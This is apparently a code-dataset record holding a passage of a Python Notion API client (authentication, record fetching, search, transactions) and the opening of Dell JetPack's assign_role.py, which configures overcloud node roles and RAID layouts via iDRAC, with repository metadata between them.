def __init__(
self,
token_v2=None,
monitor=False,
start_monitoring=False,
enable_caching=False,
cache_key=None,
email=None,
password=None,
client_specified_retry=None,
):
self.session = create_session(client_specified_retry)
if token_v2:
self.session.cookies = cookiejar_from_dict({"token_v2": token_v2})
else:
self._set_token(email=email, password=password)
if enable_caching:
cache_key = cache_key or hashlib.sha256(token_v2.encode()).hexdigest()
self._store = RecordStore(self, cache_key=cache_key)
else:
self._store = RecordStore(self)
if monitor:
self._monitor = Monitor(self)
if start_monitoring:
self.start_monitoring()
else:
self._monitor = None
self._update_user_info()
def start_monitoring(self):
self._monitor.poll_async()
def _fetch_guest_space_data(self, records):
"""
guest users have an empty `space` dict, so get the space_id from the `space_view` dict instead,
and fetch the space data from the getPublicSpaceData endpoint.
Note: This mutates the records dict
"""
space_id = list(records["space_view"].values())[0]["value"]["space_id"]
space_data = self.post(
"getPublicSpaceData", {"type": "space-ids", "spaceIds": [space_id]}
).json()
records["space"] = {
space["id"]: {"value": space} for space in space_data["results"]
}
def _set_token(self, email=None, password=None):
if not email:
email = input("Enter your Notion email address:\n")
if not password:
password = getpass("Enter your Notion password:\n")
self.post("loginWithEmail", {"email": email, "password": password}).json()
def _update_user_info(self):
records = self.post("loadUserContent", {}).json()["recordMap"]
if not records["space"]:
self._fetch_guest_space_data(records)
self._store.store_recordmap(records)
self.current_user = self.get_user(list(records["notion_user"].keys())[0])
self.current_space = self.get_space(list(records["space"].keys())[0])
return records
def get_email_uid(self):
response = self.post("getSpaces", {}).json()
return {
response[uid]["notion_user"][uid]["value"]["email"]: uid
for uid in response.keys()
}
def set_user_by_uid(self, user_id):
self.session.headers.update({"x-notion-active-user-header": user_id})
self._update_user_info()
def set_user_by_email(self, email):
email_uid_dict = self.get_email_uid()
uid = email_uid_dict.get(email)
if not uid:
raise Exception(
"Requested email address {email} not found; available addresses: {available}".format(
email=email, available=list(email_uid_dict)
)
)
self.set_user_by_uid(uid)
def get_top_level_pages(self):
records = self._update_user_info()
return [self.get_block(bid) for bid in records["block"].keys()]
def get_record_data(self, table, id, force_refresh=False, limit=100):
return self._store.get(table, id, force_refresh=force_refresh, limit=limit)
def get_block(self, url_or_id, force_refresh=False, limit=100):
"""
Retrieve an instance of a subclass of Block that maps to the block/page identified by the URL or ID passed in.
"""
block_id = extract_id(url_or_id)
block = self.get_record_data("block", block_id, force_refresh=force_refresh, limit=limit)
if not block:
return None
if block.get("parent_table") == "collection":
if block.get("is_template"):
block_class = TemplateBlock
else:
block_class = CollectionRowBlock
else:
block_class = BLOCK_TYPES.get(block.get("type", ""), Block)
return block_class(self, block_id)
def get_collection(self, collection_id, force_refresh=False):
"""
Retrieve an instance of Collection that maps to the collection identified by the ID passed in.
"""
coll = self.get_record_data(
"collection", collection_id, force_refresh=force_refresh
)
return Collection(self, collection_id) if coll else None
def get_user(self, user_id, force_refresh=False):
"""
Retrieve an instance of User that maps to the notion_user identified by the ID passed in.
"""
user = self.get_record_data("notion_user", user_id, force_refresh=force_refresh)
return User(self, user_id) if user else None
def get_space(self, space_id, force_refresh=False):
"""
Retrieve an instance of Space that maps to the space identified by the ID passed in.
"""
space = self.get_record_data("space", space_id, force_refresh=force_refresh)
return Space(self, space_id) if space else None
def get_collection_view(self, url_or_id, collection=None, force_refresh=False):
"""
Retrieve an instance of a subclass of CollectionView that maps to the appropriate type.
The `url_or_id` argument can either be the URL for a database page, or the ID of a collection_view (in which case
you must also pass the collection)
"""
# if it's a URL for a database page, try extracting the collection and view IDs
if url_or_id.startswith("http"):
match = re.search("([a-f0-9]{32})\?v=([a-f0-9]{32})", url_or_id)
if not match:
raise Exception("Invalid collection view URL")
block_id, view_id = match.groups()
collection = self.get_block(
block_id, force_refresh=force_refresh
).collection
else:
view_id = url_or_id
assert (
collection is not None
), "If 'url_or_id' is an ID (not a URL), you must also pass the 'collection'"
view = self.get_record_data(
"collection_view", view_id, force_refresh=force_refresh
)
return (
COLLECTION_VIEW_TYPES.get(view.get("type", ""), CollectionView)(
self, view_id, collection=collection
)
if view
else None
)
def refresh_records(self, **kwargs):
"""
The keyword arguments map table names into lists of (or singular) record IDs to load for that table.
Use `True` instead of a list to refresh all known records for that table.
"""
self._store.call_get_record_values(**kwargs)
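    # Hedged illustration (the ids are placeholders): refresh two specific
    # "block" records and every known "space" record in one call:
    #   client.refresh_records(block=["<block-id-1>", "<block-id-2>"], space=True)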
def refresh_collection_rows(self, collection_id):
row_ids = [row.id for row in self.get_collection(collection_id).get_rows()]
self._store.set_collection_rows(collection_id, row_ids)
def post(self, endpoint, data):
"""
All API requests on Notion.so are done as POSTs (except the websocket communications).
"""
url = urljoin(API_BASE_URL, endpoint)
response = self.session.post(url, json=data)
if response.status_code == 400:
logger.error(
"Got 400 error attempting to POST to {}, with data: {}".format(
endpoint, json.dumps(data, indent=2)
)
)
raise HTTPError(
response.json().get(
"message", "There was an error (400) submitting the request."
)
)
response.raise_for_status()
return response
def submit_transaction(self, operations, update_last_edited=True):
if not operations:
return
if isinstance(operations, dict):
operations = [operations]
if update_last_edited:
updated_blocks = set(
[op["id"] for op in operations if op["table"] == "block"]
)
operations += [
operation_update_last_edited(self.current_user.id, block_id)
for block_id in updated_blocks
]
# if we're in a transaction, just add these operations to the list; otherwise, execute them right away
if self.in_transaction():
self._transaction_operations += operations
else:
data = {"operations": operations}
self.post("submitTransaction", data)
self._store.run_local_operations(operations)
def query_collection(self, *args, **kwargs):
return self._store.call_query_collection(*args, **kwargs)
def as_atomic_transaction(self):
"""
Returns a context manager that buffers up all calls to `submit_transaction` and sends them as one big transaction
when the context manager exits.
"""
return Transaction(client=self)
def in_transaction(self):
"""
Returns True if we're currently in a transaction, otherwise False.
"""
return hasattr(self, "_transaction_operations")
def search_pages_with_parent(self, parent_id, search="", limit=100):
data = {
"query": search,
"parentId": parent_id,
"limit": limit,
"spaceId": self.current_space.id,
}
response = self.post("searchPagesWithParent", data).json()
self._store.store_recordmap(response["recordMap"])
return response["results"]
def search_blocks(self, search, limit=25):
return self.search(query=search, limit=limit)
def search(
self,
query="",
search_type="BlocksInSpace",
limit=100,
sort="Relevance",
source="quick_find",
isDeletedOnly=False,
excludeTemplates=False,
isNavigableOnly=False,
requireEditPermissions=False,
ancestors=[],
createdBy=[],
editedBy=[],
lastEditedTime={},
createdTime={},
):
data = {
"type": search_type,
"query": query,
"spaceId": self.current_space.id,
"limit": limit,
"filters": {
"isDeletedOnly": isDeletedOnly,
"excludeTemplates": excludeTemplates,
"isNavigableOnly": isNavigableOnly,
"requireEditPermissions": requireEditPermissions,
"ancestors": ancestors,
"createdBy": createdBy,
"editedBy": editedBy,
"lastEditedTime": lastEditedTime,
"createdTime": createdTime,
},
"sort": sort,
"source": source,
}
response = self.post("search", data).json()
self._store.store_recordmap(response["recordMap"])
return [self.get_block(result["id"]) for result in response["results"]]
def create_record(self, table, parent, **kwargs):
# make up a new UUID; apparently we get to choose our own!
record_id = str(uuid.uuid4())
child_list_key = kwargs.get("child_list_key") or parent.child_list_key
args = {
"id": record_id,
"version": 1,
"alive": True,
"created_by_id": self.current_user.id,
"created_by_table": "notion_user",
"created_time": now(),
"parent_id": parent.id,
"parent_table": parent._table,
}
args.update(kwargs)
with self.as_atomic_transaction():
# create the new record
self.submit_transaction(
build_operation(
args=args, command="set", id=record_id, path=[], table=table
)
)
# add the record to the content list of the parent, if needed
if child_list_key:
self.submit_transaction(
build_operation(
id=parent.id,
path=[child_list_key],
args={"id": record_id},
command="listAfter",
table=parent._table,
)
)
return record_id
def get_task_status(self, task_id):
"""
        Get the status of a single task.
"""
data = self.post(
"getTasks",
{
"taskIds": [task_id]
}
).json()
results = data.get("results")
if results is None:
return None
if not results:
# Notion does not know about such a task
print("Invalid task ID.")
return None
if len(results) == 1:
state = results[0].get("state")
return state
return None
def wait_for_task(self, task_id, interval=1, tries=10):
"""
        Wait for a task by polling up to 'tries' times, every 'interval' seconds.
        The 'interval' parameter accepts fractional seconds (e.g. 0.75) for sub-second polling.
"""
for i in range(tries):
state = self.get_task_status(task_id)
if state in ["not_started", "in_progress"]:
sleep(interval)
elif state == "success":
return state
print("Task takes more time than expected. Specify 'interval' or 'tries' to wait more.")
class Transaction(object):
is_dummy_nested_transaction = False
def __init__(self, client):
self.client = client
def __enter__(self):
if hasattr(self.client, "_transaction_operations"):
            # client is already in a transaction, so we'll just make this one a no-op and let the outer one handle it
self.is_dummy_nested_transaction = True
return
self.client._transaction_operations = []
self.client._pages_to_refresh = []
self.client._blocks_to_refresh = []
def __exit__(self, exc_type, exc_value, traceback):
if self.is_dummy_nested_transaction:
return
operations = self.client._transaction_operations
del self.client._transaction_operations
# only actually submit the transaction if there was no exception
if not exc_type:
self.client.submit_transaction(operations)
self.client._store.handle_post_transaction_refreshing()
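# Hedged usage sketch (not part of the original module). The token and page
# URL below are hypothetical placeholders; see the NotionClient docstring for
# where the "token_v2" cookie comes from.
if __name__ == "__main__":
    client = NotionClient(token_v2="REPLACE_WITH_TOKEN_V2_COOKIE")
    page = client.get_block(
        "https://www.notion.so/Example-0123456789abcdef0123456789abcdef")
    if page is not None:
        print(page.title)
        # Buffer several edits and submit them as one transaction.
        with client.as_atomic_transaction():
            page.title = "Renamed via the API"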
| 34.311715
| 121
| 0.59283
|
cb6761195cd0c56e0ecd633df1dcc3c8f429852c
| 59,361
|
py
|
Python
|
src/pilot/assign_role.py
|
kamlesh6808/JetPack
|
54871b307cc7385939dd89f9bb5e9ed9bb3036fe
|
[
"Apache-2.0"
] | 1
|
2019-04-01T16:01:01.000Z
|
2019-04-01T16:01:01.000Z
|
src/pilot/assign_role.py
|
kamlesh6808/JetPack
|
54871b307cc7385939dd89f9bb5e9ed9bb3036fe
|
[
"Apache-2.0"
] | null | null | null |
src/pilot/assign_role.py
|
kamlesh6808/JetPack
|
54871b307cc7385939dd89f9bb5e9ed9bb3036fe
|
[
"Apache-2.0"
] | 1
|
2021-07-15T15:26:53.000Z
|
2021-07-15T15:26:53.000Z
|
#!/usr/bin/python3
# Copyright (c) 2016-2021 Dell Inc. or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import argparse
from collections import defaultdict
from collections import namedtuple
from constants import Constants
from shutil import copyfile
import json
import logging
import math
import os
import sys
import yaml
import errno
import fcntl
import time
from dracclient import utils
from dracclient.constants import POWER_OFF
from dracclient.constants import RebootRequired
from dracclient.exceptions import DRACOperationFailed, \
DRACUnexpectedReturnValue, WSManInvalidResponse, WSManRequestFailure
from oslo_utils import units
from arg_helper import ArgHelper
from credential_helper import CredentialHelper
from ironic_helper import IronicHelper
from job_helper import JobHelper
from logging_helper import LoggingHelper
import requests.packages
from ironicclient.common.apiclient.exceptions import InternalServerError
discover_nodes_path = os.path.join(os.path.expanduser('~'),
'pilot/discover_nodes')
sys.path.append(discover_nodes_path)
from discover_nodes.dracclient.client import DRACClient # noqa
requests.packages.urllib3.disable_warnings()
# Perform basic configuration of the logging system, which configures the root
# logger. It creates a StreamHandler with a default Formatter and adds it to
# the root logger. Log messages are directed to stderr. This configuration
# applies to the log messages emitted by this script and the modules in the
# packages it uses, such as ironicclient and dracclient.
logging.basicConfig()
# Create this script's logger. Give it a more friendly name than __main__.
LOG = logging.getLogger(os.path.splitext(os.path.basename(sys.argv[0]))[0])
LOG.setLevel(logging.DEBUG)
# Create a factory function for creating tuple-like objects that contain the
# role that the node will play and an optional index that indicates placement
# order in the rack.
#
# The article
# http://stackoverflow.com/questions/35988/c-like-structures-in-python
# describes the use of collections.namedtuple to implement C-like structures in
# Python.
RoleIndex = namedtuple('RoleIndex', ['role', 'index', ])
DCIM_VirtualDiskView = ('http://schemas.dell.com/wbem/wscim/1/cim-schema/2/'
'DCIM_VirtualDiskView')
DCIM_PhysicalDiskView = ('http://schemas.dell.com/wbem/wscim/1/cim-schema/2/'
'DCIM_PhysicalDiskView')
NORAID = "1"
RAID0 = "2"
RAID_TYPE_TO_DESCRIPTION = {
NORAID: "No RAID",
RAID0: "RAID0",
"4": "RAID1",
"64": "RAID5",
"128": "RAID6",
"2048": "RAID10",
"8192": "RAID50",
"16384": "RAID60"
}
NOT_SUPPORTED_MSG = " operation is not supported on th"
ROLES = {
'controller': 'control',
'compute': 'compute',
'storage': 'ceph-storage',
'computehci': 'computehci',
'powerflex': 'powerflex-storage'
}
# TODO: Use the OpenStack Oslo logging library, instead of the Python standard
# library logging facility.
#
# This would have value if this code is contributed to ironic upstream
# and ironic is using the Oslo logging library.
def parse_arguments():
parser = argparse.ArgumentParser(
description="Assigns role to Overcloud node.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("ip_mac_service_tag",
help="""IP address of the iDRAC, MAC address of the
interface on the provisioning network,
or service tag of the node""",
metavar="ADDRESS")
parser.add_argument("role_index",
type=role_index,
help="""role that the node will play, with an optional
index that indicates placement order in the
rack; choices are controller[-<index>],
compute[-<index>], and storage[-<index>]""",
metavar="ROLE")
parser.add_argument("-f",
"--flavor-settings",
default="~/pilot/flavors_settings.json",
help="file that contains flavor settings",
metavar="FILENAME")
parser.add_argument('-s',
'--skip-raid-config',
action='store_true',
help="skip configuring RAID")
parser.add_argument('-b',
'--skip-bios-config',
action='store_true',
help="skip configuring BIOS")
parser.add_argument('-o',
'--os-volume-size-gb',
help="the size of the volume to install the OS on "
"in GB",
metavar="OSVOLUMESIZEGB")
ArgHelper.add_instack_arg(parser)
LoggingHelper.add_argument(parser)
return parser.parse_args()
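# Hedged example invocation (the iDRAC address and role are placeholders; the
# node-definition and logging options contributed by ArgHelper/LoggingHelper
# are omitted because their flag names are defined elsewhere):
#   python3 assign_role.py 192.168.110.21 compute-3 --skip-bios-config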
def role_index(string):
role = string
index = None
if string.find("-") != -1:
role_tokens = role.rsplit('-', 1)
role = role_tokens[0]
index = role_tokens[1]
# do not check roles as we may have edge nodes
#if role not in ROLES.keys():
# raise argparse.ArgumentTypeError(
# "{} is not a valid role; choices are {}".format(
# role, str(
# ROLES.keys())))
if index and not index.isdigit():
raise argparse.ArgumentTypeError(
"{} is not a valid role index; it must be a number".format(index))
return RoleIndex(role, index)
def get_flavor_settings(json_filename):
flavor_settings = None
try:
with open(json_filename, 'r') as f:
try:
flavor_settings = json.load(f)
except ValueError:
LOG.exception(
"Could not deserialize flavor settings file {}".format(
json_filename))
except IOError:
LOG.exception(
"Could not open flavor settings file {}".format(json_filename))
return flavor_settings
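# Hedged sketch of the expected flavors_settings.json shape: top-level keys
# are "default" plus the flavor names in ROLES, each holding a "bios" section.
# The BIOS attribute names and values below are purely illustrative and are
# not taken from the shipped file:
#   {
#     "default": {"bios": {"BootMode": "Uefi"}},
#     "control": {"bios": {"ProcVirtualization": "Enabled"}}
#   }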
def calculate_bios_settings(super_role, flavor_settings, json_filename):
return calculate_category_settings_for_role(
'bios',
super_role,
flavor_settings,
json_filename)
def calculate_category_settings_for_role(
category,
super_role,
flavor_settings,
json_filename):
default = {}
if 'default' in flavor_settings and category in flavor_settings['default']:
default = flavor_settings['default'][category]
flavor = ROLES[super_role]
flavor_specific = {}
if flavor in flavor_settings and category in flavor_settings[flavor]:
flavor_specific = flavor_settings[flavor][category]
# Flavor-specific settings take precedence over default settings.
category_settings = merge_two_dicts(default, flavor_specific)
if not category_settings:
LOG.critical(
'File {} does not contain "{}" settings for flavor "{}"'.format(
json_filename,
category,
flavor))
return None
return category_settings
def merge_two_dicts(x, y):
z = x.copy()
z.update(y)
return z
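# Illustration: values from the second argument win on key collisions, e.g.
#   merge_two_dicts({'a': 1, 'b': 2}, {'b': 9}) -> {'a': 1, 'b': 9}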
def get_drac_client(node_definition_filename, node):
drac_ip, drac_user, drac_password = \
CredentialHelper.get_drac_creds_from_node(node,
node_definition_filename)
drac_client = DRACClient(drac_ip, drac_user, drac_password)
# TODO: Validate the IP address is an iDRAC.
#
# This could detect an error by an off-roading user who provided an
# incorrect IP address for the iDRAC.
#
# A to be developed dracclient API should be used to perform the
# validation.
return drac_client
def define_target_raid_config(super_role, drac_client):
raid_controller_ids = get_raid_controller_ids(drac_client)
if not raid_controller_ids:
LOG.critical("Found no RAID controller")
return None
if super_role == 'controller':
logical_disks = define_controller_logical_disks(drac_client,
raid_controller_ids)
elif super_role == 'compute':
logical_disks = define_compute_logical_disks(drac_client,
raid_controller_ids)
elif super_role == 'storage':
logical_disks = define_storage_logical_disks(drac_client,
raid_controller_ids)
elif super_role == 'computehci':
logical_disks = define_storage_logical_disks(drac_client,
raid_controller_ids)
elif super_role == 'powerflex':
logical_disks = define_storage_logical_disks(drac_client,
raid_controller_ids)
else:
        LOG.critical(
            'Cannot define target RAID configuration for role "{}"'.format(
                super_role))
return None
return {
'logical_disks': logical_disks} if logical_disks is not None else None
def get_raid_controller_ids(drac_client):
disk_ctrls = drac_client.list_raid_controllers()
raid_controller_ids = []
for cnt in disk_ctrls:
if drac_client.is_raid_controller(cnt.id):
raid_controller_ids.append(cnt.id)
return raid_controller_ids
def define_controller_logical_disks(drac_client, raid_controller_ids):
if len(raid_controller_ids) > 1:
LOG.critical(
"Found more than one RAID controller:\n {}".format(
"\n ".join(raid_controller_ids)))
return None
raid_10_logical_disk = define_single_raid_10_logical_disk(
drac_client, raid_controller_ids[0])
# None indicates an error occurred.
if raid_10_logical_disk is None:
return None
logical_disks = list()
# Add the disk to the list only if it is not empty.
if raid_10_logical_disk:
logical_disks.append(raid_10_logical_disk)
return logical_disks
def define_compute_logical_disks(drac_client, raid_controller_ids):
if len(raid_controller_ids) > 1:
LOG.critical(
"Found more than one RAID controller:\n {}".format(
"\n ".join(raid_controller_ids)))
return None
raid_10_logical_disk = define_single_raid_10_logical_disk(
drac_client, raid_controller_ids[0])
# None indicates an error occurred.
if raid_10_logical_disk is None:
return None
logical_disks = list()
# Add the disk to the list only if it is not empty.
if raid_10_logical_disk:
logical_disks.append(raid_10_logical_disk)
return logical_disks
def define_single_raid_10_logical_disk(drac_client, raid_controller_name):
physical_disk_names = get_raid_controller_physical_disk_ids(
drac_client, raid_controller_name)
number_physical_disks = len(physical_disk_names)
if number_physical_disks >= 4:
LOG.info(
"Defining RAID 10 on the following physical disks, and marking it "
"the root volume:\n {}".format(
"\n ".join(physical_disk_names)))
logical_disk = define_logical_disk(
'MAX',
'1+0',
raid_controller_name,
physical_disk_names,
is_root_volume=True)
elif number_physical_disks == 3 or number_physical_disks == 2:
LOG.warning(
"Did not find enough disks for RAID 10; defining RAID 1 on the "
"following physical disks, and marking it the root volume:"
"\n {}".format(
"\n ".join(physical_disk_names)))
logical_disk = define_logical_disk(
'MAX',
'1',
raid_controller_name,
physical_disk_names,
is_root_volume=True)
elif number_physical_disks == 1:
LOG.warning(
"Did not find enough disks for RAID; setting physical disk {} to "
"JBOD mode".format(
physical_disk_names[0]))
logical_disk = define_jbod_or_raid_0_logical_disk(
drac_client,
raid_controller_name,
physical_disk_names[0],
is_root_volume=True)
else:
LOG.critical(
"Found no physical disks connected to RAID controller {}".format(
raid_controller_name))
return None
return logical_disk
def get_raid_controller_physical_disk_ids(drac_client, raid_controller_fqdd):
physical_disks = drac_client.list_physical_disks()
return sorted(
(d.id for d in physical_disks if d.controller == raid_controller_fqdd),
key=physical_disk_id_to_key)
def check_cntlr_physical_disks_len(cntrl_physical_disks):
# Make sure we have enough drives attached to the RAID controller to create
# a RAID1
    return len(cntrl_physical_disks) >= 2
def define_storage_logical_disks(drac_client, raid_controllers):
all_physical_disks = drac_client.list_physical_disks()
# Get the drives controlled by the RAID controller
raid_cntlr_physical_disks = {}
for disk in all_physical_disks:
if disk.controller in raid_controllers:
if disk.controller in raid_cntlr_physical_disks:
raid_cntlr_physical_disks[disk.controller].append(disk)
else:
raid_cntlr_physical_disks[disk.controller] = [disk]
# Make sure we have at least one drive for Ceph OSD/journals
if len(all_physical_disks) < 3:
LOG.critical(
"Storage nodes must have at least one drive for Ceph OSD/journal "
"configuration")
return None
boss_controller = [cntrl for cntrl in raid_controllers
if drac_client.is_boss_controller(cntrl)]
if boss_controller:
if check_cntlr_physical_disks_len(
raid_cntlr_physical_disks[boss_controller[0]]):
os_logical_disk = define_storage_operating_system_logical_disk(
raid_cntlr_physical_disks[boss_controller[0]],
drac_client, boss_controller[0])
else:
LOG.critical("The BOSS card has only 1 SSD. "
"2 SSDs are needed to configure a RAID 1")
return None
else:
raid_controller = [cntrl for cntrl in raid_controllers
if len(raid_cntlr_physical_disks[cntrl]) >= 2]
if raid_controller:
os_logical_disk = define_storage_operating_system_logical_disk(
raid_cntlr_physical_disks[raid_controller[0]],
drac_client, raid_controller[0])
else:
LOG.critical("At least 2 drives controlled by the same RAID "
"controller are needed to configure a RAID 1")
return None
if os_logical_disk is None:
return None
os_physical_disk_names = os_logical_disk['physical_disks'] \
if 'physical_disks' in os_logical_disk else None
# Define JBOD logical disks with the remaining physical disks.
#
# A successful call returns a list, which may be empty; otherwise,
# None is returned.
logical_disks = [os_logical_disk]
for raid_controller in raid_controllers:
jbod_capable = drac_client.is_jbod_capable(raid_controller)
# Determine the physical disks that remain for JBOD.
remaining_physical_disks = [disk for disk in
raid_cntlr_physical_disks[raid_controller]
if disk.id not in os_physical_disk_names]
jbod_logical_disks = define_jbod_logical_disks(
drac_client, remaining_physical_disks, raid_controller,
jbod_capable)
if jbod_logical_disks is None:
return None
logical_disks.extend(jbod_logical_disks)
return logical_disks
def define_storage_operating_system_logical_disk(physical_disks, drac_client,
raid_controller_name):
(os_logical_disk_size_gb,
os_physical_disk_names) = find_physical_disks_for_storage_os(
physical_disks)
if os_physical_disk_names is None:
return None
# Define a RAID 1 logical disk to host the operating system.
LOG.info(
"Defining RAID 1 logical disk of size {} GB on the following physical "
"disks, and marking it the root volume:\n {}".format(
str(int(os_logical_disk_size_gb)),
'\n '.join(os_physical_disk_names)))
if drac_client.is_boss_controller(raid_controller_name):
os_logical_disk_size_gb = 0
os_logical_disk = define_logical_disk(
int(os_logical_disk_size_gb),
'1',
raid_controller_name,
os_physical_disk_names,
is_root_volume=True)
return os_logical_disk
def find_physical_disks_for_storage_os(physical_disks):
physical_disk_selection_strategies = [
(cardinality_of_smallest_spinning_disk_size_is_two,
'two drives of smallest hard disk drive size'),
(last_two_disks_by_location,
'last two drives by location')]
for index, (strategy, description) in enumerate(
physical_disk_selection_strategies, start=1):
os_logical_disk_size_gb, os_physical_disk_names = strategy(
physical_disks)
assert (os_logical_disk_size_gb and os_physical_disk_names) or not (
os_logical_disk_size_gb or os_physical_disk_names)
if os_physical_disk_names:
LOG.info(
"Strategy {} for selecting physical disks for the operating "
"system logical disk -- {} -- found disks:\n {}".format(
index,
description,
'\n '.join(os_physical_disk_names)))
assert len(os_physical_disk_names) >= 2
break
else:
LOG.info(
"Strategy {} for selecting physical disks for the operating "
"system logical disk -- {} -- found no disks".format(
index,
description))
if os_physical_disk_names is None:
LOG.critical(
"Could not find physical disks for operating system logical disk")
return (os_logical_disk_size_gb, os_physical_disk_names)
def cardinality_of_smallest_spinning_disk_size_is_two(physical_disks):
# Bin the spinning physical disks (hard disk drives (HDDs)) by size
# in gigabytes (GB).
disks_by_size = bin_physical_disks_by_size_gb(physical_disks,
media_type_filter='hdd')
# Order the bins by size, from smallest to largest. Since Python
# dictionaries are unordered, construct a sorted list of bins. Each
# bin is a dictionary item, which is a tuple.
ordered_disks_by_size = sorted(disks_by_size.items(), key=lambda t: t[0])
# Handle the case where we have no spinning disks
if not ordered_disks_by_size:
return (0, None)
# Obtain the bin for the smallest size.
smallest_disks_bin = ordered_disks_by_size[0]
smallest_disk_size = smallest_disks_bin[0]
smallest_disks = smallest_disks_bin[1]
cardinality_of_smallest_disks = len(smallest_disks)
if cardinality_of_smallest_disks == 2:
sorted_smallest_disk_ids = sorted((d.id for d in smallest_disks),
key=physical_disk_id_to_key)
return (smallest_disk_size, sorted_smallest_disk_ids)
else:
return (0, None)
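# Hedged illustration (sizes in GB are made up): with HDD bins of
# [558, 558, 1116, 1116] the two 558 GB drives are selected; with
# [558, 558, 558, 1116] (three drives in the smallest bin) this strategy
# declines and returns (0, None), so the next strategy is tried.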
def last_two_disks_by_location(physical_disks):
assert len(physical_disks) >= 2
disks_by_location = sorted((d for d in physical_disks),
key=physical_disk_to_key)
last_two_disks = disks_by_location[-2:]
# The two disks (2) must be of the same media type, hard disk drive
# (HDD) spinner or solid state drive (SSD).
if last_two_disks[0].media_type != last_two_disks[1].media_type:
return (0, None)
# Determine the smallest size of the two (2) disks, in gigabytes.
logical_disk_size_mb = 0
if last_two_disks[0].size_mb == last_two_disks[1].size_mb:
# They are of equal size.
logical_disk_size_mb = last_two_disks[0].size_mb
elif last_two_disks[0].size_mb < last_two_disks[1].size_mb:
# The first disk is smaller.
logical_disk_size_mb = last_two_disks[0].size_mb
else:
# The second disk is smaller.
logical_disk_size_mb = last_two_disks[1].size_mb
logical_disk_size_gb = int(logical_disk_size_mb / 1024)
# Ensure that the logical disk size is unique from the perspective
# of Linux logical volumes.
# We only need to consider the other disks, those that are not the
# last two (2).
other_disks = disks_by_location[:-2]
other_disks_by_size_gb = bin_physical_disks_by_size_gb(other_disks)
while logical_disk_size_gb in other_disks_by_size_gb:
# Subtract one (1) from the logical disk size and try again.
logical_disk_size_gb -= 1
else:
assert logical_disk_size_gb > 0
last_two_disk_ids = [d.id for d in last_two_disks]
return (logical_disk_size_gb, last_two_disk_ids)
def bin_physical_disks_by_size_gb(physical_disks, media_type_filter=None):
disks_by_size = defaultdict(list)
for physical_disk in physical_disks:
# Apply media type filter, if present.
if (media_type_filter is None or
physical_disk.media_type == media_type_filter):
disks_by_size[physical_disk.free_size_mb / 1024].append(physical_disk)
return disks_by_size
def define_jbod_logical_disks(
drac_client, physical_disks, raid_controller_name, jbod_capable):
sorted_physical_disk_names = sorted((d.id for d in physical_disks),
key=physical_disk_id_to_key)
logical_disks = list()
for physical_disk_name in sorted_physical_disk_names:
jbod_logical_disk = define_jbod_or_raid_0_logical_disk(
drac_client, raid_controller_name, physical_disk_name,
is_root_volume=False, jbod_capable=jbod_capable)
if jbod_logical_disk:
logical_disks.append(jbod_logical_disk)
return logical_disks
def define_jbod_or_raid_0_logical_disk(drac_client,
raid_controller_name,
physical_disk_name,
is_root_volume=False,
jbod_capable=None):
if jbod_capable is None:
jbod_capable = drac_client.is_jbod_capable(raid_controller_name)
if jbod_capable:
# Presently, when a RAID controller is JBOD capable, there is no
# need to return a logical disk definition. That will hold as
# long as this script executes the ironic DRAC driver RAID
# delete_configuration clean step before the
# create_configuration step, and it leaves all of the physical
# disks in JBOD mode.
'''TODO: Define a JBOD logical disk when the ironic DRAC driver
supports the 'raid_level' property's 'JBOD' value in the RAID
configuration JSON. That is a more robust approach and better
documents the RAID configuration on the ironic node. It would
also eliminate the dependency the RAID create_configuration
clean step has on the delete_configuration step.'''
return dict()
else:
return define_logical_disk('MAX', '0', raid_controller_name,
[physical_disk_name], is_root_volume)
def define_logical_disk(
size_gb,
raid_level,
controller_name,
physical_disk_names,
is_root_volume=False):
logical_disk = dict(
size_gb=size_gb,
raid_level=raid_level,
controller=controller_name,
physical_disks=physical_disk_names)
if is_root_volume:
logical_disk['is_root_volume'] = is_root_volume
return logical_disk
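# Hedged illustration of the ironic target RAID entry this builds (the
# controller and disk names are hypothetical):
#   define_logical_disk('MAX', '1+0', 'RAID.Integrated.1-1',
#                       ['Disk.Bay.0:...', 'Disk.Bay.1:...'],
#                       is_root_volume=True)
#   -> {'size_gb': 'MAX', 'raid_level': '1+0',
#       'controller': 'RAID.Integrated.1-1',
#       'physical_disks': ['Disk.Bay.0:...', 'Disk.Bay.1:...'],
#       'is_root_volume': True}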
def physical_disk_id_to_key(disk_id):
components = disk_id.split(':')
disk_subcomponents = components[0].split('.')
    # Disk FQDDs that include an enclosure segment have three ':'-separated
    # components (disk:enclosure:controller); direct-attached disks have two.
    if len(components) >= 3:
enclosure_subcomponents = components[1].split('.')
controller_subcomponents = components[2].split('.')
else:
enclosure_subcomponents = 'Enclosure.None.0-0'.split('.')
controller_subcomponents = components[1].split('.')
disk_connection_type = disk_subcomponents[1]
try:
disk_number = int(disk_subcomponents[2])
except: # noqa: E722
disk_number = int(disk_subcomponents[2].split('-')[0])
enclosure_type = enclosure_subcomponents[1]
enclosure_numbers = enclosure_subcomponents[2].split('-')
enclosure_major_number = int(enclosure_numbers[0])
enclosure_minor_number = int(enclosure_numbers[1])
controller_type = controller_subcomponents[0]
controller_location = controller_subcomponents[1]
controller_numbers = controller_subcomponents[2].split('-')
controller_major_number = int(controller_numbers[0])
controller_minor_number = int(controller_numbers[1])
return tuple([controller_type,
controller_location,
controller_major_number,
controller_minor_number,
enclosure_type,
enclosure_major_number,
enclosure_minor_number,
disk_connection_type,
disk_number])
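# Hedged example (the FQDD below is hypothetical but follows the Dell
# <disk>:<controller> naming handled by the direct-attached branch above):
#   physical_disk_id_to_key("Disk.Direct.0-0:AHCI.Slot.6-1")
#   -> ('AHCI', 'Slot', 6, 1, 'None', 0, 0, 'Direct', 0)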
def physical_disk_to_key(physical_disk):
return physical_disk_id_to_key(physical_disk.id)
def configure_raid(ironic_client, node_uuid, super_role, os_volume_size_gb,
drac_client):
'''TODO: Add some selective exception handling so we can determine
when RAID configuration failed and return False. Further testing
should uncover interesting error conditions.'''
if get_raid_controller_ids(drac_client) is None:
LOG.warning("No RAID controller is present. Skipping RAID "
"configuration")
return True
LOG.info("Configuring RAID")
LOG.info("Do not power off the node; configuration will take some time")
